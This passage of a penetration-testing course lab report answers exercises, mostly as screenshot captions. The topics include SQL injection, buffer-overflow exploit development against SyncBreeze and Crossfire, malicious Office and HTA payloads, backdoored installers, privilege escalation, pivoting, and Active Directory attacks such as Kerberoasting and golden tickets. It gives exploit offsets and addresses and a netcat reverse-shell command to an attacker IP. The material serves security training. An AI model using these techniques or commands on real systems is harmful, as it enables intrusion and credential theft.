Ans: echo "<h2>Welcome " . $_SESSION['user'] “ here in the code the username is displayed
based upon what we enter in the username textbox in login.php and that is why we see the
sqlinjection query in the username.

4. Execute the SQL injection in the password field. Is the “LIMIT 1” necessary in the payload?
Why or why not?

Ans: “LIMIT 1” is necessary because some programming languages have functions that query
the database and expect a single record. If these functions get more than one row, they will
generate an error.

9.4.5.9 Exercises
1. Enumerate the structure of the database using SQL injection.

146 | Page
Getting username

2. Understand how and why you can pull data from your injected commands and have it displayed
on the screen.

3. Extract all users and associated passwords from the database.

147 | Page
148 | Page
9.4.5.11 Exercises
1. Exploit the SQL injection along with the MariaDB INTO OUTFILE function to obtain
code execution.
Injecting code into sql query

Code execution

149 | Page
2. Turn the simple code execution into a full shell.
Using powershell base 64 encoded payload

150 | Page
9.4.5.13 Exercises
1. Use sqlmap to obtain a full dump of the database.

151 | Page
2. Use sqlmap to obtain an interactive shell.

9.5.1 Exercises (Reporting is not required for these exercises)

152 | Page
10.2.5 Exercises
1. Repeat the steps shown in this section to see the 12 A’s copied onto the stack.
Passing 12 A’s as argument to strcpy.exe

Executing the program till return instruction we can see 12 A’s onto the stack as hex ‘41’

153 | Page
2. Supply at least 80 A’s and verify that EIP after the strcpy will contain the value
41414141.
80 A’s using python

Using 80 A’s as argument to strcpy.exe

EIP overwritten

154 | Page
11.1.1.1 Exercises
1. Build the fuzzer and replicate the SyncBreeze crash.

Fuzzer made in python3

155 | Page
2. Inspect the content of other registers and stack memory. Does anything seem to be
directly influenced by the fuzzing input?

156 | Page
EIP register is overwritten with A's

11.2.3.1 Exercises
1. Write a standalone script to replicate the crash.

157 | Page
2. Determine the offset within the input buffer to successfully control EIP.

3.Update your standalone script to place a unique value into EIP to ensure your offset is
correct.

158 | Page
159 | Page
11.2.5.1 Exercises
1. Repeat the required steps in order to identify the bad characters that cannot be included in
the payload.

Script serving badchars

160 | Page
161 | Page
Using mona.py to identify badchars

Upon close inspection and multiple tries it is concluded that 0x00, 0x0A, 0x0D, 0x25, 0x26, 0x2B,
and 0x3D are the badchars.

2. Why are these characters not allowed? How do these bad hex characters translate to ASCII?

X00 is the null byte which determines where does a string end if we use this char In our shell
code the execution of our shellcode will stop as soon as the machine detects null byte.
X0a in ascii translates to ‘\n’ which is a format string that represents new line and 0xd is carriage
return ‘\r’.
X025 is ‘%’ which is again used as a format string in many languages and can thus interrupt
execution.
X026 is ‘&’ which is special character used in C.

162 | Page
X2b is the ‘+’ which is a mathematical sign in various languages. X3d
is the ‘=’ sign.

11.2.7.1 Exercises
1. Locate the JMP ESP that is usable in the exploit.

163 | Page
2. Update your PoC to include the discovered JMP ESP, set a breakpoint on it, and follow the
execution to the placeholder shellcode.

Update script.

164 | Page
165 | Page
Set a breakpoint at JMP ESP instruction.

Stepping into the JMP ESP shows that execution starts at ‘\x5c\x74\x98\x02’ Which
is our place holder for shellcode.

166 | Page
11.2.9.1 Exercises
1. Update your PoC to include a working payload.

167 | Page
2. Attempt to execute your exploit without using a NOP sled and observe the decoder corrupting
the stack.

As we can see in the screenshot below the decoder is corrupting the stack.

168 | Page
4. Add a NOP sled to your PoC and obtain a shell from SyncBreeze

Added 10 NOPs

Executed the exploit and got shell.

169 | Page
170 | Page
11.2.10.1 Exercise
1. Update the exploit so that SyncBreeze still runs after exploitation.

Adding Exitfunc flag set to thread.

Got reverse shell.

171 | Page
12.2.1.1 Exercises
1. Log in to your dedicated Linux client using the credentials you received.

172 | Page
2. On your Kali machine, recreate the proof-of-concept code that crashes the Crossfire
server.

3.Attach the debugger to the Crossfire server, run the exploit against your Linux client,
and confirm that the EIP register is overwritten by the malicious buffer.

173 | Page
As we can see in the Screenshot Below EIP has been overwritten by ASCII “A”

174 | Page
 12.3.1.1 Exercises
1. Determine the correct buffer offset required to overwrite the return address on the stack.

Created pattern using msf-pattern_create

Crashed the program and copied the EIP registers value.

175 | Page
 Got offset at 4368 bytes.

2. Update your stand-alone script to ensure your offset is correct.

176 | Page
 12.5.1.1 Exercises
1. Determine the opcodes required to generate a first stage shellcode using msf-nasm_shell.

3. Identify the bad characters that cannot be included in the payload and return address.

177 | Page
Upon close inspection of characters we can see that \x00 and \x20 are bad characters

12.6.1.1 Exercises
1. Find a suitable assembly instruction address for the exploit using EDB.

Found jmp esp at 0x08134596

178 | Page
2. Include the first stage shellcode and return address instruction in your proof-of-concept and
ensure that the first stage shellcode is working as expected by single stepping through it in the
debugger.

179 | Page
180 | Page
Stepping into the breakpoint at Jmp esp now the EIP points to the first stage of the payload.

Stepping in even further we can see the instructions add eax,12 and jmp eax being executed
which finally points to the “A’s” we sent to crash the application.

181 | Page
12.7.1.1 Exercises

1. Update your proof-of-concept to include a working payload.

182 | Page
183 | Page
2. Obtain a shell from the Crossfire application with and without a debugger.

Got Shell.

Without Debugger.

184 | Page
13.1.2.3 Exercises
Note: Reporting is not required for these exercises

13.2.2.1 Exercises
1. Use msfvenom to generate a HTML Application and use it to compromise your Windows client.

Generating exploit.

185 | Page
Searching and executing the malicious HTA file

Got reverse shell.

186 | Page
 2. Is it possible to use the HTML Application attack against Microsoft Edge users, and if so, how?

Yes it is possible and the process is exactly the same with edge browsers as
it is was with internet explorer. Just the difference is we get prompted twice before he
execution. Edge checks for a valid digital signature before execution, as it is unable to
find a digital signature in our malicious file it will give a warning prompt as in the screen
shot below.

187 | Page
13.3.2.1 Exercise
1. Use the PowerShell payload from the HTA attack to create a Word macro that sends a reverse
shell to your Kali system.

Added Macro.

188 | Page
Attempted to open the DOTM file.

189 | Page
 Got reverse shell.

13.3.3.1 Exercise
1. Use the PowerShell payload to create a batch file and embed it in a Microsoft Word
document to send a reverse shell to your Kali system.

Created launch.bat

190 | Page
Got Reverse Shell.
191 | Page
13.3.4.1 Exercises
1. Trigger the protection by Protected View by simulating a download of the
Microsoft Word document from the Internet.

Simulating downloading file from the internet.

192 | Page
Protected view triggered.

193 | Page
2. Reuse the batch file and embed it in a Microsoft Publisher document to receive a
reverse shell to your Kali system.

Embbeding batch file in publisher document.

194 | Page
3. Move the file to the Apache web server to simulate the download of the Publisher
document from the Internet and confirm the missing Protected View.

195 | Page
Simulating downloading publisher file from the internet.

Opening the file we can see the protected view is bypassed.

196 | Page
Running the Object.

197 | Page
Got reverse shell.

14.3.1.1 Exercises
1. Connect to your dedicated Linux client and start the vulnerable Apache James
service using the /usr/local/james/bin/run.sh script.

Connected to the dedicated client and started the apache james service.

198 | Page
2. Enumerate the target using port scanning utilities and use information from the
banners and Internet searches to determine the software running on the machine.

199 | Page
3. Use the searchsploit tool to find exploits for this version on the online resources
mentioned in this module.

200 | Page
201 | Page
4. Launch the exploit and verify that the payload is executed upon logging in to the
machine.

Launched the exploit.

Payload executed. As you can see in the screenshot below the exploit has created a
proof.txt file.

202 | Page
5. Attempt to modify the payload variable in order to get a reverse shell on the
target machine.

Modified the exploit to get reverse shell.

Triggered the exploit via ssh and got the reverse shell.

203 | Page
15.1.3.1 Exercises
1. Locate the exploit discussed in this section using the searchsploit tool in Kali Linux.

204 | Page
2. Install the mingw-w64 suite in Kali Linux and compile the exploit code.

205 | Page
206 | Page
15.1.4.1 Exercises
1. Modify the connection information in the exploit in order to target the SyncBreeze
installation on your Windows client.

2. Recompile the exploit and use Wireshark to confirm that the code successfully
initiates a socket connection to your dedicated Windows client.

Recompiling.

Code successfully initiated a socket connection with the windows client

207 | Page
15.1.5.1 Exercise
1. Find any valid return address instruction and alter the one present in the original
exploit.
As we have previously developed a exploit for sync breeze we will use the return
address used in that exploit. This was the return address in the exploit we created. (see
eip in the screenshot).

208 | Page
Modifying the return address in the exploit code.

15.1.6.1 Exercises
1. Generate a reverse shell payload using msfvenom while taking into account the bad
characters of our exploit.

209 | Page
2. Replace the original payload with the newly generated one.

210 | Page
4. Attach the debugger to the target process and set a breakpoint at the return address
instruction.
Attached the process and set a breakpoint at “10090C83”

211 | Page
 5. Compile the exploit and run it. Did you hit the breakpoint?

Compiled the exploit and ran it.

Breakpoint was not hit.

212 | Page
15.1.7.1 Exercises
1. Fix the overflow buffer such that the EIP register will be overwritten by your
chosen return address instruction.

Modified the buffer size.

213 | Page
Recompiled the exploit and got shell.

2. Install the ASX to MP3 Converter application located under the

C:\Tools\fixing_exploits directory; download the exploit for ASX to MP3 Converter from
EDB391 and edit it in order to get a shell on your dedicated Windows machine.

Found the return address for the exploit to be 0x1003789D

214 | Page
Refuzzed the application to get correct buffer length

Which was found out to be 241 bytes.

Found out badchars “\x00\x0a\x1a” and generated shellcode using msfvenom.

215 | Page
Reflected all the modifications the buffer length, EIP, Shellcode, NOPs, in the exploit
code downloaded from https://www.exploit-db.com/exploits/38382.

216 | Page
Loading exploit.asx into the vulnerable application.

Got reverse shell.

217 | Page
15.2.3.1 Exercises
1. Connect to your dedicated Linux lab client and start the apache2 service; the
target web application is located under /var/www/https/.

Connected to the Linux lab client and started webserver.

218 | Page
2. Modify the original exploit and set the base_url variable to the correct IP
address of your dedicated Linux lab client as well as the protocol to HTTPS.

3. Get familiar with the requests Python library and adjust your exploit
accordingly to avoid SSL verification.

4. Edit the username and password variables to match the ones from our test
case (username
“admin”, password “HUYfaw763”).

219 | Page
6. Try to run the exploit against the Linux lab client, does it work? If not, try to explain why.

The exploit dosent work due to index out of range error which might be due to the
mismatch of csrf_param variable.

15.2.4.1 Exercises
1. Observe the error that is generated when running the exploit.

2. Attempt to troubleshoot the code and determine why the error occurs.

Error occurs due to the different csrf parameter than in the exploit.
220 | Page
3. Modify the exploit in order to avoid the error and run it against your dedicated Linux
client.

Exploit modified.

Ran exploit against linux client.

4. Verify that your exploit worked by attempting to execute the whoami command using
the remote php shell.
221 | Page
Exploit worked.

5. Attempt to obtain a fully interactive shell with this exploit.

Using payload nc -c /bin/sh 192.168.119.190 447

Got reverse shell.

16.1.3.2 Exercises
(Reporting is not required for these exercises)

16.2.5.1 Exercises
(Reporting is not required for these exercises)

222 | Page
17.3.3.2 Exercises
1. Review the code from the PowerShell script and ensure that you have a basic
understanding of how it works.

In the screenshot below we can see that the code imports various functions from
different DLL’s
By just a simple overview of the code we can see that this part of the script imports the
“VirtualAlloc” and “CurrentThread” functions from “kernel32.dll” and imports “memset”
function from the “msvcrt.dll”, these functions allow us to allocate memory, create an
execution thread, and write arbitrary data to the allocated memory.

This next part of the code in the screenshot below allocates a block of memory of size
4096 bytes using the “VirtualAlloc” function, and takes each byte of payload stored in
“$sc” and stores it into our newly allocated memory using “memset” function.

223 | Page
In the final part the script creates a new thread using “CurrentThread” function and
executes the payload in the newly created thread

2. Get a meterpreter shell back to your Kali Linux machine using PowerShell.

Generated payload.

Executed payload.

Got meterpreter shell.

224 | Page
3. Attempt to get a reverse shell using a PowerShell one-liner rather than a script.

One liner.

Got reverse shell.

17.3.3.4 Exercises
1. Inject a meterpreter reverse shell payload in the WinRAR executable.

Injecting code into winrar installer.

225 | Page
226 | Page
2. Transfer the binary to your Windows client and ensure that it is not being detected by
the antivirus.
227 | Page
Running scan on the folder “temp” where the malicious executable is stored.

3. Run the WinRAR installer and migrate your meterpreter shell to prevent a disconnect.

228 | Page
Ran the installer.

Got meterpreter reverse shell.

4. Attempt to find different executables and inject malicious code into them using
Shellter.

229 | Page
Injecting malicious code in 7zip executable. Injection was successful.

Injecting malicious code into “ChromeSetup.exe”. Injection was successful.

230 | Page
231 | Page
18.1.1.13 Exercise

1. Perform various manual enumeration methods covered in this section on both your
dedicated Windows and Linux clients. Try experimenting with various options for the
tools and commands used in this section.

Enumerating users.

Linux
232 | Page
233 | Page
Windows

Enumerating Hostname.

Linux

Windows

Enumerating the Operating System Version and Architecture.

234 | Page
Linux

Windows

Enumerating Running Processes and Services

Linux

235 | Page
236 | Page
Windows

Enumerating Networking Information.

237 | Page
Linux

Windows

238 | Page
239 | Page
240 | Page
Enumerating Firewall Status and Rules.

Linux

241 | Page
Windows

242 | Page
Enumerating Scheduled Tasks.

Linux

243 | Page
Windows

Schedule tasks

Enumerating Installed Applications and Patch Levels.

Linux

Dpkg -l

244 | Page
Windows

Enumerating Readable/Writable Files and Directories

245 | Page
Linux

Windows

246 | Page
Enumerating Unmounted Disks

Windows

Linux

247 | Page
Enumerating Device Drivers and Kernel Modules

Windows

248 | Page
Linux

Enumerating Binaries That AutoElevate

Windows

249 | Page
Linux

18.1.2.1 Exercises
1. Inspect your Windows and Linux clients by using the tools and commands presented
in this section in order to get comfortable with manual local enumeration techniques.

Windows

250 | Page
Linux

251 | Page
252 | Page
2. Experiment with different windows-privesc-check and unix_privesc_check options.

Linux

253 | Page
Using the detailed option on unix-privesc-check tool

254 | Page
Windows

Using option -all -dump with privesc-check2.exe tool

255 | Page
18.2.3.1 Exercise
1. Log in to your Windows client as the admin user and attempt to bypass UAC using
the application and technique covered above.

Started procmon.exe and fodhelper.exe

256 | Page
Found a favourable registry value to edit.

Edited the registry value to cmd.exe

Launched cmd with highest privileges.

257 | Page
18.2.4.1 Exercises
1. Log in to your Windows client as an unprivileged user and attempt to elevate your
privileges to SYSTEM using the above vulnerability and technique.

Found the vulnerable service running

258 | Page
ServiioService.exe service has full access

C program that launches cmd.exe

Sent shell.exe (the compiled c program above) to the windows client

259 | Page
Moved shell.exe to the necessary location

Escalated privilages.

Got SYSTEM.

260 | Page
2. Attempt to get a remote system shell rather than adding a malicious user.

C code to get reverse shell

Placed payload in the serviio directory.

261 | Page
Got reverse shell.

18.3.2.1 Exercise
1. Log in to your Debian client as an unprivileged user and attempt to elevate your
privileges to root using the above techniques.

Enumerated cron jobs.

Injected reverse shell into “user_backups.sh”

Got reverse Shell.

262 | Page
18.3.3.1 Exercise
1. Log in to your Debian client with your student credentials and attempt to elevate your
privileges by adding a superuser account to the /etc/passwd file.

Exploiting the vulnerability.

Exploit successful.

19.1.1.1 Exercise
(Reporting is not required for this exercise)

19.2.1.1 Exercise
(Reporting is not required for this exercise)

19.3.1.1 Exercises
(Reporting is not required for these exercises)

263 | Page
19.3.2.1 Exercise 19.3.3.1 Exercise
(Reporting is not required for these exercises)
(Reporting is not required for these exercises)

19.3.4.1 Exercises
(Reporting is not required for these exercises)

19.4.1.1 Exercises
(Reporting is not required for these exercises)

19.4.2.1 Exercises
1. Use Mimikatz to extract the password hash of an administrative user from the
Windows client.

2. Reuse the password hash to perform a pass-the-hash attack from your Kali
system and obtain code execution on your Windows client.
264 | Page
Got shell by passing the hash.

19.4.3.1 Exercise
(Reporting is not required for this exercise)

20.1.1.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.

2. Attempt to replicate the port-forwarding technique covered in the above scenario.

265 | Page
20.2.1.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.
266 | Page
2. Run the ssh_local_port_forwarding.sh script from
/root/port_forwarding_and_tunneling/ as root.

3. Take note of the Linux client and Windows Server 2016 IP addresses shown in the
Student Control Panel.

4. Attempt to replicate the smbclient enumeration covered in the above scenario.

Tunnelling.

267 | Page
Edited smb.conf

Enumerating shares. Tunnelling successful!

268 | Page
20.2.2.1 Exercises
1. Connect to your dedicated Linux lab client via SSH and run the clear_rules.sh
script from /root/port_forwarding_and_tunneling/ as root.

2. Close any SSH connections to your dedicated Linux lab client and then connect
as the student account using rdesktop and run the ssh_remote_port_forward.sh script
from /root/port_forwarding_and_tunneling/ as root.

Logging in.

3. Attempt to replicate the SSH remote port forwarding covered in the above
scenario and ensure that you can scan and interact with the MySQL service.

Tunnling successful

269 | Page
Scanning service.

Interacting with the service.

20.2.3.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.

2. Take note of the Linux client and Windows Server 2016 IP addresses.

270 | Page
3. Create a SOCKS4 proxy on your Kali machine, tunneling through the Linux target.

4. Perform a successful nmap scan against the Windows Server 2016 machine through
the proxy.

271 | Page
5. Perform an nmap SYN scan through the tunnel. Does it work? Are the results
accurate?

It works but the results are not accurate.

272 | Page
20.3.1.1 Exercises
1. Obtain a reverse shell on your Windows lab client through the Sync Breeze
vulnerability.

273 | Page
Exploited the sync breeze and got reverse shell.

2. Use plink.exe to establish a remote port forward to the MySQL service on your
Windows 10 client.

274 | Page
3. Scan the MySQL port via the remote port forward.

20.4.1.1 Exercise
1. Obtain a reverse shell on your Windows lab client through the Sync Breeze
vulnerability.

2. Using the SYSTEM shell, attempt to replicate the port forwarding example using
netsh.

Adding firewall rule.

275 | Page
Allowing inbound traffic on port 4445.

Mounted the share.

20.5.1.1 Exercises
1. Connect to your dedicated Linux lab client as the student account using rdesktop and
run the http_tunneling.sh script from /root/port_forwarding_and_tunneling/ as root.

276 | Page
2. Start the apache2 service and exploit the vulnerable web application hosted on port
443 (covered in a previous module) in order to get a reverse HTTP shell.

3. Replicate the scenario demonstrated above using your dedicated clients.

Local Port forward

277 | Page
Hts port forward started.

http client tunnel established.

RDP success

278 | Page
279 | Page
21.2.1.1 Exercise
1. Connect to your Windows 10 client and use net.exe to lookup users and groups in the
domain. See if you can discover any interesting users or groups.

Found 1 admin account jeff_admin and 2 service accounts and one user account
named adam.

Jeff_admin belongs to domain admins group.

280 | Page
Adam is a member of “another nested group”

281 | Page
Enumerating domain groups show 3 intresting groups
“Secret_Group,Another_Nested_groups,Nested_groups”

282 | Page
21.2.2.1 Exercises
1. Modify the PowerShell script to only return members of the Domain Admins group.

283 | Page
2. Modify the PowerShell script to return all computers in the domain.

3. Add a filter to only return computers running Windows 10.

21.2.3.1 Exercises
1. Repeat the enumeration to uncover the relationship between Secret_Group,
Nested_Group, and Another_Nested_Group.

Secret_Group is a member of Nested_Group.

284 | Page
Nested group is member of another nested group.

Another_Nested_Group has member adam

285 | Page
2. The script presented in this section required us to change the group name at
each iteration. Adapt the script in order to unravel nested groups programmatically
without knowing their names beforehand.

21.2.4.1 Exercises
1. Download and use PowerView to perform the same enumeration against the
student VM while in the context of the Offsec account.

Offsec has logged into DC01

286 | Page
DC01 has offsec logged into from the windows client

2. Log in to the student VM with the Jeff_Admin account and perform a remote
desktop login to the domain controller using the Jeff_Admin account. Next, execute the
GetNetLoggedOn function on the student VM to discover logged-in users on the domain
controller while in the context of the Jeff_Admin account.

287 | Page
3. Repeat the enumeration by using the DownloadString method from the
System.Net.WebClient class in order to download PowerView from your Kali system
and execute it in memory without saving it to the hard disk.

21.2.5.1 Exercises
1. Repeat the steps from this section to discover the service principal name for the IIS
server.

288 | Page
2. Discover any additional registered service principal names in the domain.

289 | Page
290 | Page
291 | Page
292 | Page
3. Update the script so the result includes the IP address of any servers where a service
principal name is registered.
Script Updated

293 | Page
4. Use the Get-SPN script and rediscover the same service principal names.

294 | Page
295 | Page
21.3.3.1 Exercises
1. Use Mimikatz to dump all password hashes from the student VM.

296 | Page
297 | Page
2. Log in to the domain controller as the Jeff_Admin account through Remote Desktop
and use Mimikatz to dump all password hashes from the server.

Rdesktop to Domain controller via pivoting through Debian client.

Dumped credentials.

298 | Page
21.3.4.1 Exercises
1. Repeat the manual effort of requesting the service ticket, exporting it, and cracking it
by using the tgsrepcrack.py Python script.

Requesting TGS ticket.

Exported ticket.

299 | Page
Cracked hash.

2. Perform the same action with any other SPNs in the domain.

Requested sql service TGS.

300 | Page
Dumping TGS.

Cracked TGS.

3. Crack the same service ticket using John the Ripper.

Dumping hash in john format

301 | Page
Hash cracked

4. Use the Invoke-Kerberoast.ps1 script to repeat these exercises.

Dumped hashes using Invoke-Kerberoast.ps1

302 | Page
Cracked hash of sql service.

21.3.5.1 Exercises
1. Use the PowerShell script in this module to guess the password of the jeff_admin
user.

303 | Page
2. Use the Spray-Passwords.ps1 tool to perform a lookup brute force attack of all
users in the domain from a password list.

304 | Page
21.4.2.1 Exercise
1. Execute the overpass the hash attack above and gain an interactive command
prompt on the domain controller. Make sure to reboot the Windows 10 client before
starting the exercise to clear any cached Kerberos tickets.

Running notepad as different user.

Got cached credentials for jeff_admin

305 | Page
Launched powershell as jeff_admin.

306 | Page
Cached jeff_admin TGT.

307 | Page
Launched cmd.exe as the jeff_admin user.

308 | Page
21.4.3.1 Exercises
1. Create and inject a silver ticket for the iis_service account.

309 | Page
2. How can creating a silver ticket with group membership in the Domain Admins group
for a SQL service provide a way to gain arbitrary code execution on the associated
server?

Ans:-In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected
with Rubeus, and finally a remote shell can be obtained thanks to PsExec.

3. Create a silver ticket for the SQL service account.

21.4.4.1 Exercises
1. Repeat the exercise of launching Notepad using Excel and DCOM.

Created Macro.

310 | Page
Copied the macro xlsm file to the destination and launched the macro.

311 | Page
Task Manager shows excel has launched in the background along with notepad.

2. Improve the attack by replacing the VBA macro with a reverse shell connecting back
to Netcat on your windows student VM.

312 | Page
Created macro.

Launched the macro via DCOM.

313 | Page
Got Reverse shell on windows client.

314 | Page
3. Set up a pivoting channel from the domain controller to your Kali machine and obtain
a reverse shell

Set up a tunnel to my attacker machine from the windows client using socat. And ran
the payload on the server which is set to lport 8080.

315 | Page
Started a netcat listner on attacker machine with port 1337. And got reverse shell.

21.5.1.1 Exercises
1. Repeat the steps shown above to dump the krbtgt password hash and create and
use a golden ticket.
316 | Page
Dumped the krbtgt hash on Domain Controller.

On the windows client used mimikatz and the krbtgt hash to generate a Golden Ticket.
Launched cmd.

Successfully launched a high privileged shell as fakeuser.

317 | Page
2. Why is the password hash for the krbtgt account changed during a functional
level upgrade from Windows 2003 to Windows 2008?

Ans: This is likely due to the fact that the KRBTGT password changes as part of the
DFL update to 2008 to support Kerberos AES encryption.

22.1.3.1 Exercises
1. Start the postgresql service and launch msfconsole.

318 | Page
2. Use the SMB, HTTP, and any other interesting auxiliary modules to scan the lab
systems.

319 | Page
320 | Page
3. Review the hosts information in the database.

321 | Page
22.2.1.1 Exercise
1. Exploit SyncBreeze using the existing Metasploit module.

22.3.3.1 Exercise
1. Take time to review and experiment with the various payloads available in Metasploit.

Using HTTP payload.

322 | Page
Using windows/meterpreter/reverse_ipv6_tcp. Didn’t work.

323 | Page
324 | Page
Using exploit/windows/http/syncbreeze_bof

325 | Page
22.3.7.1 Exercises
1. Create a staged and a non-staged Linux binary payload to use on your Kali system.

326 | Page
Staged.

Non-staged.

2. Setup a Netcat listener and run the non-staged payload. Does it work?

Non-stage payload works flawlessly.

327 | Page
3. Setup a Netcat listener and run the staged payload. Does it work?

Staged payload doesn’t work and give segmentation fault.

4. Get a Meterpreter shell on your Windows system. Practice file transfers.

Upload.

Download.

328 | Page
5. Inject a payload into plink.exe. Test it on your Windows system.

Got reverse shell.

329 | Page
6. Create an executable file running a Meterpreter payload and execute it on your
Windows system.

File created.

Executed.

Got Reverse shell.

7. After establishing a Meterpreter connection, setup a new transport type and change
to it.

330 | Page
22.4.1.1 Exercise
1. Create a new Metasploit module for your SyncBreeze exploit.

331 | Page
Module created.

332 | Page
22.5.4.1 Exercise
1. Use post-exploitation modules and extensions along with pivoting techniques to
enumerate and compromise the domain controller from a meterpreter shell obtained
from your Windows 10 client.

Loaded kiwi to dump credentials on windows client.

333 | Page
Added routes to access windows server and scanned its ports.

Used windows/smb/psexec module to access windows server.

334 | Page
Tried using autorouting to pivot to windows server.

Got shell on windows server.

335 | Page
22.6.1.1 Exercise
1. Create a resource script using both a second stage encoder and autorun scripts and
use it with the meterpreter payload.

336 | Page
23.1.3.1 Exercises
1. Install and start PowerShell Empire on your Kali system.

337 | Page
2. Create a PowerShell Empire listener on your Kali machine and execute a stager on
your Windows 10 client.

Creating Listener.

338 | Page
339 | Page
Executing launcher.

3. Experiment with the PowerShell Empire agent and its basic functionality.

Whoami shows current user.

Shell launches a command shell.

Steal token steals tokens form other processes.

340 | Page
Mimikatz loads mimikatz to the victim and dumps password hashes.

341 | Page
342 | Page
Sherlock is a vulnerability scanner.

343 | Page
344 | Page
345 | Page
23.3.1.1 Exercises
1. Set up a PowerShell Empire listener and stager and obtain a working agent.

346 | Page
2. Perform enumeration on the domain using various modules.

Using sherlock to discover vulnerabilities.

347 | Page
348 | Page
Used Situational awareness module.

349 | Page
3. Perform a remote desktop login with the account Jeff_Admin to ensure the
credentials are cached on the Windows 10 client and then dump the credentials using
PowerShell Empire.

Used mimikatz module.

350 | Page
4. Experiment with the different lateral movement modules.

Get_user module.

Executed privesc module

351 | Page
352 | Page
Using bypass fodhelper to get a high privilege shell.

Using mimikatz to dump credentials.

353 | Page
24.2.2.1 Exercise
1. Use sqlmap to exploit the SQL injection and extract the username and password.

24.5.1.1 Exercises
1. Modify the original Python exploit and capture the reverse shell.

Modified the exploit.

354 | Page
355 | Page
Got revshell.

2. The original UDF exploit is advertised as a privilege escalation exploit. Why are we
getting an unprivileged shell?

Because in the last few lines of exploit we generate a suid binary to launch a bash
interactive shell. But in the manual exploit method provided in the pdf we skip the suid
generation part. And even if we include the suid part the exploit fails because on ZORA
machine, mysql account has not got privileges to make folders and files in that directory.
And even the /bin/bash is not suid binary.

356 | Page